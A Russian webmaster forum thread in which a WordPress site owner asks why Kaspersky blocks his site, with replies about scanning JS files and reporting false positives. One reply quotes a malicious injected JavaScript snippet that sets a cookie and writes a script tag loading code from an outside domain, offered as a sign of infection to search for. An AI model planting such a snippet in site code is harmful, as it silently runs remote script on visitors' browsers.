Касперский ругается на сайт

BkSeo
На сайте с 10.06.2013
Offline
126
1447

Здравствуйте, подскажите как решить проблему

Есть сайт на вордпресс, установлен бесплатный шаблон одной из известных студий,

нареканий со стороны ПС - никаких, чисто случайно, зашел на сайт с другого компьютера

с антивирусом касперского и получил сообщение что доступ блокирован в связи с подозрением на вирусы. Другие антивирусы - нод,аваст,др.вэб и т.п. никаких проблем не видят, онлайн сканирование

всеми известными сервисами тоже ошибок не находит, лишь на одном было маленькое упоминание что возможно один из java scriptов ошибочно распознаётся как троян... редиректов - тоже не обнаружено. Вопрос - что делать в подобной ситуации? писать касперским?если да то мб есть специальный сервис для таких случаев?

Greatbolt
На сайте с 22.05.2011
Offline
84
#1

Смотрите файлы Js и swf. Чаще всего это один код, который прописывается в эти файлы. Можно скачать папочку на компьютер, лучше архивом, затем распаковать, при этом сохранив архив.

Папку проверить Каспером, он покажет, какой код он нашел и в каких файлах. Найденные файлы он поместит на карантин. Затем Каспера надо отключить, распаковать папку заново и уже там править указанные Каспером файлы.

Если код один - устанавливаете себе программку notepad++, там есть функция поиска фразы по папке и ее массовая замена.

И да, вряд ли это ошибка. Остальные просто не видят вирусные сигнатуры до их активного проявления

Отличные тексты для Бурж сайтов. Вебархив. Ищу сам, за качество отвечаю. 12 руб. / 1к текста. Оплата после проверки текстов. Отдаю в одни руки. Уникальность 90-100% etxt/text.ru/content-watch.
BkSeo
На сайте с 10.06.2013
Offline
126
#2

Greatbolt, спасибо за совет,так наверное и сделаю

вот кстати что находит онлайн проверка

themes/jdgallery/mootools-1.2-more.js, тип файла: javascript
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирус PUA.Script.Packed-2 вспомогательную библиотеку jquery.js
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирусы PUA.Script.Packed-1 некоторые безобидные упакованные javascript-библиотеки

и ещё

themes/js/pngfix.js, тип файла: javascript
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирус PUA.Script.Packed-2 вспомогательную библиотеку jquery.js
• содержит сомнительный код, но НЕ вирус: ClamAV принимает за вирусы PUA.Script.Packed-1 некоторые безобидные упакованные javascript-библиотеки

может ещё идеи будут?

draff
На сайте с 30.03.2010
Offline
65
#3
BkSeo:
может ещё идеи будут?

Проверь может быть в конце яваскрипта

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://pagecookie.org/pagecookie.js"></script>');}
Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
OG
На сайте с 09.10.2013
Offline
2
#4

В любом случае потом пишите им сюда: http://support.kaspersky.ru/virlab/helpdesk.html

Тип запроса: "Ложное срабатывание на веб-ресурс"

DK
На сайте с 10.06.2012
Offline
53
#5

Если сайт попадает в базу опасных сайтов Каспера, то даже если Вы удалите вирус, все равно

Каспер будет ругаться. Он даже будет ругаться если удалить вообще все содержимое (весь сайт).

Поэтому насчет написать им - абсолютно согласен.

Лучшая альткоин биржа! ( https://livecoin.net/?from=Livecoin-Nuyww1A2 ) Лучший платежный агрегатор ( http://wallet.advcash.com/referral/adb4ecd5-f065-4f1b-abdb-e667e58e37a9" )
seocore
На сайте с 25.09.2006
Offline
143
#6
Denis-K:
Поэтому насчет написать им - абсолютно согласен.

они делают достаточно часто перепроверки, по-этому к тому моменту когда они отработают тикет с вашей жалобой, скорее всего проблема уже самоустранится 🍿

Инструменты для веб-мастера: кластеризатор СЯ (https://goo.gl/MQWfqO), все запросы конкурента (https://goo.gl/hd5uHS), дешевые XML-лимиты (https://goo.gl/aDZbPI)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий